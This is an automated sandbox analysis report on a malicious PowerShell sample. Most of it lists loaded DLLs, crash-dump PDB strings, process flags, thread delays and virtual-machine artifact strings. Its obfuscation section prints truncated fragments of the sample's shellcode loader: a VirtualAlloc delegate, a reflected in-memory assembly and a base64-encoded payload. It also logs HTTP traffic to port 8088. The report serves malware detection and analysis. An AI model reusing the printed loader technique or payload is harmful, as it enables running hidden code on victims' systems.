            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: System.Configuration.Install.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Data.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Core.pdb`- source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Core.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Numerics.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.DirectoryServices.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: mscorlib.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Configuration.Install.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb8 source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb@y' source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Xml.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.Security.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.ni.pdbRSDS source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.DirectoryServices.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Management.Automation.pdbP source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Configuration.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Data.ni.pdbRSDSC source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Data.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Configuration.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Xml.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Management.Automation.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Management.pdbSystem.Transactions.ni.dll source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Data.pdbH source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Management.Automation.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: mscorlib.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.pdbH source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Management.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Management.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Core.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Transactions.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Transactions.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Xml.pdbP41 source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Numerics.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Transactions.ni.pdbRSDS source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.ni.pdb source: WERAAA7.tmp.dmp.6.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WERAAA7.tmp.dmp.6.dr

            Data Obfuscation

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$var_buffer = $var_va.Invoke([IntPtr]::Z
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('M
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('32ugx9PL6yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hRc2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCFWUaijqyMjI2um41dEayLzc6hrO2eoYwNqIvPAdWvc6mKoF6trIvVuEuprEuOPYuLqLmIi4h
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001F467640128 push eax; ret 0_2_000001F467640364
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001F46764023A push FFFFFFDAh; ret 0_2_000001F46764023D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001F467640286 push eax; ret 0_2_000001F467640364
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34657967 push ebx; retf 0_2_00007FFD3465796A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3465A26C push esp; retf 0_2_00007FFD3465A26D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34655BA0 pushad ; iretd 0_2_00007FFD34655BB9

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 8088
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3743Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6113Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1176Thread sleep time: -11990383647911201s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: Amcache.hve.6.drBinary or memory string: VMware
            Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
            Source: powershell.exe, 00000000.00000002.2213129020.000001F467862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRN
            Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
            Source: powershell.exe, 00000000.00000002.2213129020.000001F467898000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.6.drBinary or memory string: vmci.sys
